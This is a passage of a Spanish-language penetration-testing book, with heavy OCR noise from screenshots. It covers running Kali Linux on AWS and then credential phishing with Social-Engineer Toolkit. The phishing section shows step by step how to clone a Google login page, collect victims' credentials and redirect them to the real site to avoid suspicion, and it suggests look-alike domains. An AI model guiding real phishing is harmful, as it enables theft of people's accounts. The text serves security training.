Export Alf URLs to File. 
Export Selected URLs to File... 
| Export URLs for Context 


“Compare with Another Session... 





Y $ contexts 
E) Default Context 
» @ Sites 





Ahora esta herramienta y todo el tema de OWASP es bastante mas complejo, 
asi que te conviene que cheques un poco mas de las opciones que tiene para escanear, 
pero incluso utilizado superficialmente es una herramienta bastante util para encontrar 
fallas en base a los estandares OWASP. 


OWASP ZAP 








EXPLOTACION 


Esta es la fase en la que vamos a comprometer a varios sistemas de 
información. Existen muchas formas de explotación, desde los RATs (Remote 
Access Trojan), que te permitiran tomar control remotamente de un sistema, hasta 
los exploits, que te permiten entrar al sistema por medio de un error, usualmente 
necesitas utilizar una combinación de varias técnicas para realizar una prueba de 
intrusión exitosa y completa. 


4.1 ATAQUES FUERA DE LA RED LOCAL DESDE LA NUBE 


Lo primero que tienes que saber, es que, al querer comprometer a un sistema, 
generalmente necesitamos tener o poder establecer algún tipo de comunicación entre 
el sistema comprometido y el sistema, y por lo tanto, las direcciones IP de ambas 
máquinas deben de poder comunicarse, es decir, si estas en una red LAN, debes estar 
en la misma red LAN que el objetivo, de lo contrario, debes tener una IP global, o 
WAN, a la que la IP LAN del objetivo pueda comunicarse. 


En tu ordenador y en red doméstica, no tendrás acceso rápido y sencillo a 
una IP global, ya que aunque tu router tiene una IP global, y podrás acceder a esta 
para realizar ataques por medio de port-forwarding, no lo recomendaría, debido a 
que es tedioso y no es compatible con todos los routers, si se reinicia o apaga tu 
router podría cambiar tu IP o perder comunicación con el objetivo, y la única manera 
de realizar ataques sería dentro de esa red, por lo tanto, yo sugiero algunas otras 
alternativas. 
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4.1.1 Amazon Web Services 


Amazon Web Services, o AWS, es uno de los servicios de computación en la 
nube mas grande que existe, a pesar de que es el servicio con el que me siento mas 
cómodo, no significa que sea el único y mejor (dependiendo a quien le preguntes), o 
más barato, ya que existen Google Cloud, Azure, y DigitalOcean en los que podrías 
hacer las mismas cosas. Sin embargo, aquí mencionare como configurar tu laboratorio 
en la nube de forma que puedas realizar ataques remotamente desde cualquier lado, 
hasta desde un móvil. 


Primero, entra a https://aws.amazon.com y crea una cuenta. 


Products v Scletlont Pring Getting Startad Documentation | AWS Marketplace Sopper Caroma  Parmers More = 


Amazon SageMaker 


Vian de Sesources 


Batch Transform 


Dosumentstion 





Después que hayas pasado por el proceso de crear una cuenta, te encontraras 
con una pantalla en la que harás clic en la pestaña de “Services”, y veras los principales 
servicios, el que nos interesa por el momento es el que se [lama EC2, haz clic en ese. 
Adicionalmente, vale la pena que hagas clic en la pestafia de tu usuario en la derecha, 
donde podrás observar tus costos/pagos, numero de cuenta, entre otros detalles. 


Resource Groups v k: 


History 





Censole Home 


EC2 10; Compute 
S3 EC2 
Billing Lightsai E 
Elastic Container Service 
EKS 
Amazon Polly Lambda 
Batch 
Elastic Seanstaik 


Amazon Lex 


| Storage 


33 

EFS 

Glacier 

Storage Gateway 
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Una vez dentro de EC2(Elastic Compute Cloud) verás una pantalla similar 
a esta pantalla, hay algunas cosas que debes de entender antes de poder operar un 
ordenador en la nube para realizar pruebas de penetración. 


AEC RADAS APE US TADO N 


| eects 
aes ese ais he aes: RAS Cms ee AN in 07 D eeng e ECE Me Aia! information 
i Gen ians oii 
Craaie instance Darina 
HED Kesome 


R SEUS AIDA ED pa WE ait A 2s A ed SCS ee 


© Scheduled Events 


Us Exp 
Sgi Horas 
O 
wert ope ase 
Posa by Sarva SAIS I 
Acre Zone Sates Rainy tiat > 
¿su SEPA NAS PERAS A teak Se IO hang Reena: EES 
KELAN ETE S DEN UN PASS sas £ 
Ma yeso Ems 
Laos El te area Kenit 
Picón Masks 
kang ttire 
E DRI ste 





4.1.1.1 INFORMACION PERSONAL 


Hay algunas cosas que debes saber de tu propia cuenta para utilizar 
adecuadamente AWS, para esto, vas a requerir irte a la sección “My Account” abajo 
de tu usuario. 


My Account 
My Organization 
My Billing Dashboard 


My Security Credentials 


Sign Out 





Como puedes ver, aqui puedes ver mucha informacion de tu cuenta: de pago 
e informacion personal. 
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Dashboard 
Bilis 


Cost Explorer 


Budgets 
Reports 

Cost Allocation Tags 
Payment Methods 
Payment History 
Consolidated Billing 
Preferences 

Credits 

Tax Settings 





Pon atención a donde dice “account settings”, aquí notaras un número que es 
el “Account Id”, cuando menciona “Account Id” o AWS Account Number, a esto 
me refiero, ya que te sirve para acceder a algunas funciones de tu cuenta tal como 
compartir instancias y AMIs. 


Account Settings 


Account Id: E 
Seller: AWS Inc. 
Account Name: Pablo Gutierrez 

Password: ***** 





4.1.1.2 REGIONES 


Las instancias en Amazon están divididas por “regiones” y tú puedes tener 
activos corriendo en diferentes regiones al mismo tiempo, sin embargo, cada región 
tiene un límite de activos utilizables por cuenta, así que toma eso en cuenta. La 
región se refiere a donde está el servidor de Amazon que te está dando el servicio, 
naturalmente te conviene utilizar el servidor más cercano, para seleccionar la región 
basta con hacerlo en el botón a la esquina superior derecha. 


US East {N. Virginia) 


| US East (Ohio) 


US West (N. California) 
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4.1.1.3 INSTANCIAS 


Las instancias son los sistemas con los que inicies, pueden ser de diferentes 
sistemas operativos como Linux y Windows, y pueden tener o no interfaces gráficas, 
estas generalmente tienen dos estados, apagada y prendida, y si quieres borrarla, 
deberás usar “terminate” para eliminarla de tu consola de instancias. en esta consola, 
accedida por el menú a la izquierda, podrás ver las instancias que tengas apagadas, 
prendidas, y sus detalles, tales como la llave con la que se accede al sistema, sistemas 
de monitoreo, sus IP internas y externas, y que tipo de instancia es. 


<A Fer by mace and mestre or seach by kapse 

Mon => istana D > imamen Type = 
e Kims EII Zed 
E 

x iTS Zed 


Instance: | -osoesoesIPieS4et (Kali Linux) Provate P: 172.31.13.118 


Description : Sius Onos = Motoring = Tags. == Usage Instucions 


hs O EIN 
instance stats stopped 
Lorcha 


a 
SRA me hioa nes. vi oovan es 


Kak Lian AE IRA ist 
iaa) 





Ahora, para lanzar una instancia, deberás hacer clic en el botón azul donde 
dice “launch instance” y seleccionar la instancia que requieres y configurar sus 
opciones como que tanta memoria, procesador y almacenaje quieres que tenga, así 
como sus configuraciones de seguridad. 


ş z 7 % Gaot eE 
Step 1: Choose an Amazon Machine image (AMD 
BARES AO Sar ars De KPEE OTI CIEN neem, ARCEA weve ted PICE: AU ELA rar REELE TAE WAC YE BE ese NS, ETT E PE AMS DO E eae E APO ome ARES. 
| Quick Seat 
Aaron Unga 2 AME PTI. $50 Varo a A 
Apsara ite 2 Commas ots A A A 73 SOO 2 3 AA ines weitere sodas Droge eas 


RIA O 


Ü E pe eS 


ADELA Tren Ais ae BSS et maer The detent ase acres SS ctra, Fytse: Ste Pet eats: 





4.1.1.4 LLAVES (KEY PAIR) 


Al crear una instancia, deberás crearla con una llave, llamada en Amazon 
“Key pair”, que es una llave criptográfica en formato .pem que deberás utilizar para 
autenticar a un servidor ya sea por medio de SSH u obteniendo la contraseña de 
dicha llave. 
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Al crear una instancia te pedirá que selecciones con que llave quieres 
acceder a dicha máquina, si no tienes una llave creada, deberás generar y descargar 
una nueva. 


Es muy importante que no pierdas ni compartas las llaves, ya que es la única forma de 
acceder a tus instancias. 


Select an existing key pair or create a new key pair x 


A key pair consists of a public key that AWS stores, and a private key file that you store. Together, they 
allow you to connect fo your instance securely. For Windows AMIs, the private key file is required to 
obtain the password used to log into your instance. For Linux AMis, the private key file allows you to 
securely SSH inte your instance 


Note: The selected key pair will be added to the set of keys authorized for this instance Learn more 
about removing existing key pairs fom a public AMi. 





[Choose an existing 
Select a key pa 











rt acknowledge that | have access to the selected private key file (12345qwerty pem), and that 
without this file, | won't be abie to log inte my instance. 


Cancel 





Algunos formatos, sin embargo, no aceptan la llave en formato .pem, como 
por ejemplo Windows y Putty para acceder por medio de SSH, así que tendrás que 
generar una llave de otro tipo, para hacer esto, descarga el software de Putty en 
https://putty.org y utiliza la aplicación “PuttyGen” para convertir .pem a .ppk, que 
es lo que acepta Putty. 


Primero tendrás que abrir la aplicación, y hacer clic en el botón “Load”. 


Actions 

Generate a public/private key pair 
Load an existing private key fie 
Save the generated key 


Parameters 


Type of key to generate: 
@RSA ODSA OED25t9  QSSHIRSA 


Number of bts in a generated key: 2048 i , 
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Selecciona la llave .pem que Amazon te ha generado. 


Name 





yi generico.pem 1 


Después de haber aparecido este mensaje, simplemente haz clic en “Save 
Private key”, y guarda tu llave .ppk en algun lugar seguro. 


e PuTTY Key Generator 
File Key Conversions Help 
Key 
Public key for pasting into OpenSSH authorized_keys file: 


Geq PuTTYgen Notice 


Successfully imported foreign key 

{OpenSSH SSH-2 private key fold PEM format)). 
To use this key with PuTTY, you need to 

use the “Save private key” command to 

save it in Puff s own format. 


Load an existing private key file 


Save the generated key 





Parameters 


Type of key to generate: 
@RSA ODSA Q ECDSA Q ED25519 — (O)SSH-1(RSA) 


Number of bits in a generated key: 
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ER PUTTY Configuration 











E Display pre-suthentication banner (SSH-2 only} 
(Bypass authentication entirely (SSH-2 only) 
Authentication methods — 

[Y Attempt authentication using Pageant 

[C] Attempt TIS or CryptoCard auth (S5H-1) 

[Y] Attempt “keyboardinteractive™ auth (SSH-2) 
Authentication parameters 

C] Allow agent forwarding 

C Allow attempted changes of usemame in SSH-2 
Private key file for authentication: 


i [| Browse... 




















¡Listo! Ahora solo utiliza la llave ppk en Putty seleccionándola en “Auth” y 
“Browse” 


ÉS PuTTY Configuration x 


Specify the destination you want to connect to [E 
_ Host Name (or iP address) Port 


Connection type: 
Load, save or delete a siored session 
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Luego solo ingresa la IP en la barra que dice “Host Name”, presionas “Open”, 
y listo, podras acceder a tu instancia por medio de SSH. 


Ahora, si estas utilizando Linux u OSX, simplemente deberás utilizar la 
terminal, basta con escribir el comando ssh -i /directorio/tu-llave.pem ec2-user@ 
nombre_del_dns 


4.1.1.5 MARKETPLACE 


El Amazon Marketplace es donde podras acceder a instancias disefiadas 
especificamente con una funcionalidad en mente, por ejemplo, para seguridad, o 
algun sistema en particular como Android, etc., la diferencia a una instancia normal, 
es su especialidad, que están hechas por una organización en particular, necesitas 
suscribirte a estas para utilizarlas, y generalmente hablando, son más caras, aunque 
con la ventaja de estar preconfiguradas. 


Step 1: Choose an Amazon Machine image (AMI) : 
An AMI is a template that contains the software configuration ¿operating system, application server, and applications) required to launch your mstance. : 


Quick Start 
Q Search AWS Marketplace Products 
My AMIs 


[ as 
pe wefawsmarketplace 
£ e 

e AME Find and buy software that runs in the AWS Cloud, software from trusted vendors like SAP, Zend, Microsoft, as wi 
Marketplace products you are currently subscribed to by visiting Your Software in the AWS Marketplace. 7 


Y Categories 
E Featured Software 


Ali Categories 
infrastructure Software 4 J er k) TREND 
(2236) 14 Barracuda UNIPE 3) MICRO 
Developer Toots (562) n 7 i mh 
Sarracuda CloudGen ySRX Next Generation Matillion ETL for Trend Micro Deep 
Firewall for AWS -... Firewall Amazon Redshift Security 
Rating KARA Sola by Juniper Networks Railing & eae Rating ite @ 
Soild by Barracuda Networks petro plop as Solé by Matikon Soi hy Trend Micro 
tre. - Fror 51.371 a kom Stacking Fom 50,64 per hostii 
e 39,23d/% (17% savings? for for soflware usage 
Starting from 36 S0/hr of from software 
$4 59507 (12% savings} for 
sofware 


Business Software (1079) 





4.1.1.6 AMIS 


Las AMIs de AWS se puede decir que son “imágenes” de máquinas 
preconfiguradas que puedes rentar, compartir o crear, por ejemplo, hubo un tiempo 
en el que Kali no estuvo disponible en AWS, así que tuve que configurar Debían 
o Ubuntu con las herramientas de seguridad que yo utilizaba, pero no quería tener 
que configurar e instalar todas las herramientas de cero cada vez que necesitara una 
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nueva maquina, asi que cree una AMI de la maquina ya configurada, y simplemente 
podia lanzarla de nuevo cada que yo quisiera, piensa en ello como una copia de 
seguridad. 


Para crear una nueva AMI de una instancia, basta con hacer clic derecho en 


la instancia y hacer clic en Image > Createimage. 


stopped 
stopped 


ELO stopped 


Instance State iB stopped 
Instance Settings 

Create Image 
Networking 
CloudWatch Monitoring » | 





Luego de eso simplemente configura el nombre y descripción de la imagen 
que quieres crear, y presiona el botón azul “Create Image”. 


Create Image 


instance ID (D +004276ec85b2ca7e7 


image name $) 


image description @) 





Noreboot ¿55 
instance Volumes. 


Volume Delete on 
: > = rough; 
Type nates Snapshot (Ñ) | (GIB] Volume Type (D) iors © ha a - Termination 
= Y E ~ tip K 


o ~ a 2 = 


p saap- F AAA _ < A : = 
Root idewsdat A | | General Purpose SSD (6P2) Y: 180/3000 NIA a Not Encrypted 





Add New Volume 


Total size of EBS Volumes: &0 GIB 
When you create an ESS image, an EBS snapshot wiii also be created for each of the above volumes. 


cane 





Al terminar la creación de la imagen (tarda unos cuantos minutos, no es 
inmediato), para trabajar con esta, deberás entrar a la pestaña AMIs a la izquierda, y 
verás a tu imagen en la consola. 
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azor 


@ o < msaa 


~ Combades Plextor >. RaocDenos Iv: Virtuslizetion ~ 


PE Cthert = ahs » 





Esta imagen la puedes lanzar, borrar y compartir, entre otras cosas, para 
lanzarla, basta con hacer clic en donde dice “Launch”, para compartirla, haz clic en 
donde dice “Modify Image Permissions”. 


Launch 

Spot Request 

Deregister 

Register New AMI 

Copy AMI 

Modify Image Permissions 
Add/Edit Tags 

Modify Boot Volume Setting 





Y podrás compartirla con quien quieras agregando el AWS Account 
Number, o hacerla pública en el Marketplace. 


Modify Image Permissions 
This image is currently: © Public ® Private 
AWS Account Number 
This image cure: 3S AC pernnssions 


AWS Account Number Í Add Permission 


E Add “create volume” permissions ic the following associated snapshots when creating permissions: 
= sñap-Ocdc73ee3a2430858 





Cancet | save | $ 2 


Para acceder o que a quien le compartiste la AMI acceda a la imagen 
compartida, deberás hacer clic en el botón a la izquierda superior de la consola donde 
dice “Owned by me” y cambiarlo a “Private images”, donde mostraran las AMIs que 
hayan sido compartidas contigo. 
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Owned by me 


Public images 


Private images 





4.1.1.7 ELASTIC IP 


Siempre que inicias una instancia en AWS, tienes dos IPs, una global, y una 
local, por lo que podrás lanzar ataques globalmente, sin embargo, hay una limitante, 
cada vez que reinicies o apagues la máquina, tu IP global cambiará, y esto es un 
problema importante, ya que no necesariamente quieres tener tu instancia prendida 
siempre (ya que AWS cobra por hora que cada instancia este prendida), además de 
que potencialmente te podrías topar con alguna situación en la que necesites reiniciar 
tu maquina por alguna razón, y si apuntaste algo, como por ejemplo un malware o 
una página web a una IP en particular, si pierdes esta IP podría causar inconvenientes. 


Afortunadamente, AWS tiene una opción para “apartar” IPs permanentemente 
(o hasta que la liberes, más bien), y además te permite asignar esta IP a la instancia 
que gustes de forma sencilla y rápida. Para utilizar esta función, haz clic en donde 
dice “Elastic IPs” en el menú a la izquierda. 


— NETWORK & 
SECURITY 


Security Groups 


Elastic IPs 
Placement Groups 
Key Pairs 

Network Interfaces 





Al hacer clic te aparecerá una consola que te mostrará las IPs que tengas 
“apartadas”, la primera vez que lo utilices, no tendrás ninguna IP en esta consola. 


You do not have any Addresses in Eis region 





Allocate new address 3 


Para apartar una nueva IP, basta con hacer clic en el botón azul que dice 
“Allocate new address”, y presionar de nuevo el botón de “Allocate”. 
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Addresses > Allocate new adcress 


Allocate new address 


Añocate a new Etastc IF address oy seiecting the scope in which A wil be used 


> AWS Command Line Interface command 





Ahora te deberia aparecer la IP nueva en tu consola. 
Q Filter by tags and attributes or search by keyword 


@ Name ~ Elastic iP + Allocation ID 





a 48.217.48.65 eipalloc-2 a5Od 


Sin embargo, esta IP por su cuenta, no está asignada a ninguna instancia, para 
asignarla, basta con hacer clic derecho en esta, y hacer clic en “Associate addresses” 


Release addresses 


Associate address 


Add/Edit Tags 





Seguido de eso, simplemente selecciona la instancia a la que le quieras 
asignar esta IP, y presione el botón azul de nuevo. 


Resource type * instance & 
Network interface 


instance | Select an instance 


: Q Filter by attributes 
Private IP 


instance iD Name 








State 
Windows Server 2012 
+06bde9099391c94cf Kali Linux 


0444403d7H4bc7a Kali2 


Reassociation +0 /b5dc44ha2492b06 


stopped 
stopped 
stopped 





Ahora, para desvincular una IP de una instancia, basta con presionar de los 


botones anteriores “Dissasociate address”, y para “liberar” la IP, presiona “Release 
Addresses”. 
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Una vez que liberes una dirección IP, no podrás recuperarla. 





4.1.1.8 SEGURIDAD 


Por último, en AWS existen varias herramientas de seguridad para tus 
instancias, que van desde el monitoreo, alarmas, hasta configuraciones de seguridad 
como firewalls, esto se llaman “Security Groups”, y tiene mucha utilidad al manejar 
diferentes instancias que requieren diferentes puertos de entrada o salida cerrados o 
abiertos, para entrar a estas opciones, haz clic en el menú a la izquierda en el botón 
“Security Groups”. 


Security Groups 


Elastic iPs 
Piacement Groups 
Key Pairs 


Network Interfaces 





Una vez en la consola, notaras que existen grupos de seguridad, y al hacer 
clic en uno de ellos, estan las pestafias “Inbound” y “Outbound”, esto se refiere a 
los puertos abiertos para conexiones entrantes y salientes, normalmente hablando, 
tienden a tener todos los puertos entrantes cerrados excepto por el puerto 22 (SSH), 
esto puede limitar tus opciones para realizar ciertos tipos de ataques. 


¿ Q) Filter by tags and attributes or search by keyword 


Rame +. GroupiD +. Group Name +. WPCID. + Description 
sg-efS3e ” Kali Linux-Kali Linux 2013-1-....  vpe-9e2eS This security group was gen 
sg-bedd-? “t Kali Linux-Kali Linux 2018-1- ypc-dezo This security group wes gen 
a sge8ba4 "n default wpe-Se2ct default VPC security group 


Security Group: sg-eBba4580 


Desciptica | inbound :: Culbound = Tags 


Source D 
0.0.0.0 


id 
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Para modificar esto, basta con hacer clic en “Edit”, y agregar nuevos puertos 
de salida o de entrada para abrir, en este ejemplo, yo tengo maquinas con todos 
los puertos entrantes y salientes abiertos No recomiendo esto, ya que deja muchas 
formas por donde atacar, pero usando estas configuraciones adecuadamente, podrías 
tener una instancia con un alto nivel de seguridad fácilmente. 


Edit inbound rules 


Type L 


Ail tac vi 

Custom TOP Rule 

Custom UDP Rule 

Custom ICMP Rule - 

{| Custom ICMP Rule - 

*] Custom Protocol 

NAR TCE ng rules will result in the edited rule being deleted and a new nse created with the new detais. This will cause traffic that depends 
ABUDP ety brief period cf time unfit the new rule car: be created. 

ABICMP - (Pv4 

AM ICMP - IPVE 


SSH Cancel | save | 


SMTP 

















4.1.1.9 KALI LINUX EN AWS 


Ahora que conoces lo básico de AWS, querrás saber cómo utilizar esto para 
levantar y utilizar adecuadamente un Kali Linux en la nube para poder realizar ataques 
sin limitaciones por la IP, además de poder manejar tu sistema desde cualquier lugar, 
y desde cualquier dispositivo (hasta un móvil) con internet. 


Primero, deberás registrarte a la máquina en el Marketplace, puedes hacerlo 
en https: //aws.amazon.com/markeíplace/pp/B01M26MMIT . 


Kali Linux 


Seid by: Kali Linux Latest Version: Kat Linux 2013, 7* Save to Ust q 





Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and 
Security Auditing. Typical Total Price 
$0.046/hr 


ne fi 


Linux/Unix 





Una vez que estés registrado, podrás irte a la sección de instancias, y lanzar 
una máquina, haciendo clic en “Launch Instance”. 
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Y seleccionando luego de buscar en el Marketplace, a la máquina que dice 
Kali Linux 


Step 1: Choose an Amazon Machine Image (AMI 


JO Sl BB MARS PUR IES DE EI GIROS RAR RN RE e EN AN UAT A OT RTE os AR AE SE Psi As ak LESA Be BS A th yee ASSET eat peer SAME 


ae of ee ee 


TAR GS Rae 
Dears Schwa EUA ban ch SS 


Gfivonvizipas 


sake. maT 

Eight enki her mace] aa 

Edesa de od 

Kad Lina IHE HIP Seas Ace Sele A A a iR 
Es 


Pies ds. Yet ge ter 





Posteriormente, deberás configurar tu instancia, empezando por cuantos 
recursos (procesador, velocidad, RAM) quieres que tenga tu sistema. Para cosas 
sencillas la micro suele ser más que suficiente, sin embargo, si realizas un pentesting 
avanzado, utilizarás varias herramientas al mismo tiempo, te sugiero seleccionar una 
opción más poderosa. 











Step 2: Choose an Instance Type 
Amazon EC2 provides a wide selection of instance types optimized to fit different f 
for your applications. Learn more about instance types and how they can meet yd 


Filter by:  Altinstance types v Currentgeneration Y  Show/Hif 






Currently selected: 12.micro (Variable ECUs, 1 vCPUs, 2.5 GHz. Intel Xeon Fal 





Family — 


General purpose 





Presiona el botón azul, y solo te quedará confirmar los detalles de tu estancia, 
te sugiero agregar almacenaje si se requiere, y seleccionar el grupo de seguridad 
adecuado para este sistema. 
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Step 7: Review instance Launch 
Please review your instance launch details. You can gob 


> AMI Details 


> instance Type 


> Security Groups 
> instance Details 


> Storage 





> Tags 


Al presionar “Launch”, tendrás que confirmar que tengas tu llave de 
seguridad para acceder por SSH a tu sistema. 


Select an existing key pair or create a new key pair x 


A key pair consists of a pubiic key that AWS stores, and a private key file that you store. Together, they 
allow you to connect to your instance securely. For Windows AMis, the private key file is required to 
obtain the password used to fog inte your instance. For Linux AMis, the private key file allows you to 
securely SSH into your instance 


Note: The selected key pair wilt be added to the set of keys authorized for this instance. Learn more 
about removing existing key pairs from a public AMI. 


131 acknowledge that | have access to the selected private key file (12345qwerty pers), and that 
without this file, | won't be able to log into my instance. 





Una vez iniciada, te aparecerá en tu consola de instancias, junto con detalles 
de tu maquina como grupo de seguridad (que aquí también lo puedes modificar), IP 
pública (global), e IP privada, haz copy paste en la IP pública. 


instance Type - Availability Zone ~ Instance State - Status Checks += Alarm Status Pubic DNS 4Pvá) 


Public DNS Pvt}  6c2-18-105-145-204.u5-e25:-2.compura amazonaws cont 
cunning Py Public IP 18.188.146 204 


Qmedum Pors - 

Private DNS l0-172-31-43-119 us-esst-2 compute internal 
us-sastZa wate if 472.31.43.116 
deluk view inbound mizas. view subas uies 
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Para acceder a tu máquina, deberás abrir Putty, y configurar tu llave (la cual 
ya deberías tener de acuerdo con la sección de llaves). 


ÎR PuTTY Configuration 














: E Display pre-authentication banner (SSH-2 only) 


mM. + st 
Authentication methods 

Attempt authentication using Pageant 

[C] Attempt TIS or CrypteCard auth (SSH-1) 
Attempt "keyboardinteraciive” auth (SSH-2) 
Authentication parameters 

[C Allow agent forwarding 


[C Allow attempted changes of usemame in SSH-2 
Private key file for authentication: 





| [DARUTA\pabloppk | | Browse... | 











Y finalmente escribir la IP pública en la sección de “Session”, y presiona 


“Open”. 


ER PuTTY Configuration 











Basic options for your PuTTY session 








aaea 


TON 


a oan em ener O Rogn @SSH O Seña 


Load, save or delete a stored session 
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Si tienes Linux o Macintosh, utiliza el comando en la terminal ssh -i / 
directorio/tu-llave.pem ec2-user@nombre_del_dns. 


Al iniciar en Putty, te aparecerá un mensaje similar a este, solo haz clic en 


“yes”. 


PuTTY Security Alert 


The server s host key is not cached in the registry. You 
have no guarantee that the server is the computer you 
think it is. 

The server's ssh- ‘sey fingerprint is: 


if you trust this host, hit Yes to add the key to 

PuTTY s cache and carry on connecting. 

if you want to carry on connecting just once, without 
adding the key to the cache, hit No. 

if you do not trust this host, hit Cancel to abandon the 
connection. 





: zA ; En = | 


Y finalmente escribes el login en la terminal, cada sistema tiene su usuario 
default, en el caso de Kali, es ec2-user, pero otros sistemas tienen otros usuarios, 
como el de Ubuntu, que es Ubuntu. 





Una vez autenticado, ya podrás interactuar con el sistema via SSH. 





Sin embargo, ya que estamos en Kali, y muchas de las herramientas requieren 
permisos de superusuario, sugiero cambiar el usuario a root, escribiendo sudo -s 
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Ahora si, ya puedes utilizar todas las herramientas de Kali en la nube via 
SSH, sin embargo, hay situaciones en las cuales una interfaz grafica podria ser 
útil, ya sea para no requerir la llave para entrar, o para más fácilmente tener las 
terminales corriendo en la nube y administrarlas. Te sugiero iniciar el proceso VNC, 
que te permitirá obtener acceso por VNC a una interfaz gráfica, para esto, escribe 
vneserver, y la primera vez que lo inicies, tendrás que escribir una contraseña, 
escríbela (recuerda que en Linux las contraseñas son invisibles) y presiona enter. Al 
terminar, te dirá la terminal que tienes VNC corriendo en el escritorio 1. 





A este punto ya puedes cerrar la terminal SSH, para ingresar a tu sistema 
por medio de VNC, necesitaras un VNCViewer, hay muchas alternativas, 
tight VNC (hittps://https://tightvnc.com ) y Real VNCviewer (hitps://realvnc.com ) 
son algunas de las mas populares. 


Al abrir uno de los VNCViewers, simplemente tendras que escribir la IP 
junto con el numero de escritorio y presionar conectar. 








Enter a name or an IP address. To specifyaportrumber, | 3 
append it after two colons (for example, mypc::5902). ___ Options... 


Reverse Connections 
Listening mode allows people to attach your viewer to 


their desktops. Viewer will wait for incoming connections. PS, 


Tight¥NC is cross-platform remote control software. 


Hat Its source code is available to everyone, either freely 
ae C {GNU GPL license) or commerdally {with no GPL restrictions). 
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Escribe la contraseña que ingresaste en la terminal al iniciar vncserver. 


Vnc Authentication 


(EP 
Connected to: | 18.215.95.195:1 











Password: | 





¡Y listo! Ahora podrás realizar ataques desde esta máquina utilizando su 
IP publica, y podrás acceder desde cualquier lugar, recuerda que también existen 
VNCViewers para móviles, así como apps para conectarte por SSH. 


F root's X desktop (kale) - TightiNC Viewer 





aasam 





Terminai - con pats homeec?-uer 
Edit View Terminal Tabs Help 


L 


_ No te recomiendo realizar actividades ilícitas, ya que Amazon monitorea activamente 
dichas actividades, si recibes un informe de abuso y no estás haciendo nada malo, no te 
preocupes, no estás en problemas, pero sí estas realizando actividades ilícitas, podrías 
meterte en problemas. 
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4.2 PHISHING 





Phishing, también a veces llamados “scams”, son ataques de ingenieria social 
en donde se engaña a la víctima de forma que esta realiza alguna acción que nos da 
nuestro objetivo, esto puede ser entregarnos sus credenciales, abrir o descargar algún 
archivo con software malicioso, o simplemente darnos información confidencial, 
vamos a enfocarnos en robo de credenciales por el momento. 





4.2.1 Robo de credenciales de redes sociales 


Social Engineering Toolkit es probablemente la herramienta más conocida 
para realizar ataques de ingeniería social, entre estos, de phishing, y por buena razón, 
ya que ha implementado dentro de su script escrito en Python, ataques para falsificar 
páginas web y robar credenciales, para desplegar malware, e incluso metodologías 
de ataque vía Arduino, códigos QR, y ataques por redes inalámbricas. 


Esta herramienta ya está instalada en nuestro sistema Kali, para iniciarla, 
basta con escribir setoolkit en la terminal y aceptar el acuerdo (solo la primera vez 


que aparece). 
:/# setoolkit 





Al abrirse, te mostrara un menú principal, deberás escribir 1 y luego enter, 
para iniciar los ataques de ingeniería social. 


Select from the menu: 


) Exit the Social-Engineer Toolkit 
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Luego te mostrará los vectores de ataque que tiene disponible, un vector 
de ataque es una “forma” de ataque, por ejemplo, quieres atacar por una página 
web, o vía la red inalámbrica, o vía un código QR, etc. Esta herramienta tiene varios 
vectores de ataque, en este ejemplo que haremos que tiene como meta robar las 
credenciales de Google de alguien, utilizaremos la opción 2, que se refiere a utilizar 
una página web como vector de ataque. 


Select from the menu: 


Spear-Phishing Attack Vectors 
) Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 
) Arduino-Based Attack Vector 
Wireless Access Point Attack Vector 
) QRCode Generator Attack Vector 
) Powershell Attack Vectors 
SMS Spoofing Attack Vector 
Third Party Modules 





Return back to the main menu. 


Luego te mostrara varias formas de utilizar ese vector de ataque, desde 
utilizar java para atacar al sistema de la victima, hasta al navegador via Metasploit, 
vale la pena que leas las descripciones que aparecen arriba de este menú, pero lo que 
nos interesa por el momento es el robo de credenciales, así que seleccionaremos la 
opción 3. 


) Java Applet Attack Method 
Metasploit Browser Exploit Method 
Credential Harvester Attack Method 
Tabnabbing Attack Method 
Web Jacking Attack Method 


) Multi-Attack Web Method 
Full Screen Attack Method 
HTA Attack Method 


Return te Main Menu 





Ahora tenemos que seleccionar si vamos a clonar la pagina web donde 
queremos robar credenciales, utilizar un modelo, o importar el sitio, en la primera 
opción, le damos la página web, y la herramienta intentará clonar la página del 
HTML de esta, sin embargo, muchas ya tienen defensas contra estas situaciones; 
la segunda opción te da opciones de modelos precargados, y la tercera es si quieres 
utilizar el archivo externo de una página. Seleccionaremos la opción 1. 
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Web Templates 
Site Cloner 


Custom Import 


Return to Webattack Menu 





La herramienta te pedira ingresar tu IP, esta herramienta funciona guardando 
los métodos POST que se reciban en esa IP(donde está alojada tu página phishing), 
así que debes poner la IP adecuada, si estás haciendo pruebas en tu red local (LAN), 
ingresa tu IP local (la herramienta te la sugerirá automáticamente) sin embargo, si 
estás haciendo esto para un ataque con una IP pública, como por ejemplo en un Kali 
en AWS, ingresa esa IP publica, de lo contrario, no recibirás las credenciales. 





> IP address for the POST back in Harvester/Tabnabbing 


Luego de ingresar la IP adecuada, deberás seleccionar la página a la cual vas 
a atacar, así que seleccionaremos Google. 


. Java Required 


. Google 
. Twitter 





iY listo! una vez que veas estas letras, podrás compartir tu IP a la víctima, 
asegúrate que tengas el puerto 80 abierto y disponible, o no podrás correr esta 
herramienta adecuadamente. 


Tu víctima verá algo similar a esto: 


Google 


Siga in with your Googie Atcourit 


One Seog Account ki everything Googe 


BMé& Bes. B 
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Y cuando ingrese sus credenciales, veras algo como esto: 





Y a tu víctima se le redirigirá a la página real de Google para evitar sospechas, 
si deseas guardar las credenciales, al ingresar control-c en la terminal se te generará 
un reporte de estas. 


Ahora, seguramente notaste dos fallas importantes en esta herramienta: 


1. La URL que compartes es muy sospechosa, ya que es simplemente una 
IP, bueno, pues si es un problema, sin embargo, es fácil de resolver, basta 
con apuntar un dominio que se parezca al dominio real (usando dnstwist 
podrías darte una idea de esto) a esa IP usando ya sea las herramientas 
del proveedor de dominios donde compres este, o algo como route 53 de 
AWS. 


2. Existen muy pocas opciones de páginas para atacar, y si, eso es real, 
sin embargo, también puedes resolverlo utilizando la opción de clonar, 
o haciendo tus propias páginas utilizando HTML, sin embargo, usando 
algo como shellphish podrías obtener un mayor rango de páginas posibles 
para atacar. 


4.2.2 Robo de credenciales de redes sociales 2 


Shellphish es otra herramienta de ingeniería social, pero especializada 100% 
en Phishing, y por lo tanto, es mejor en esto en varios aspectos, como por ejemplo 
que tiene un rango mucho más grande de modelos de páginas, que incluyen desde 
Facebook, hasta LinkedIn y Snapchat, entre muchos otros, además, tiene la ventaja 
en particular, que gracias a que integra ngrok dentro de su script, la página se crea 
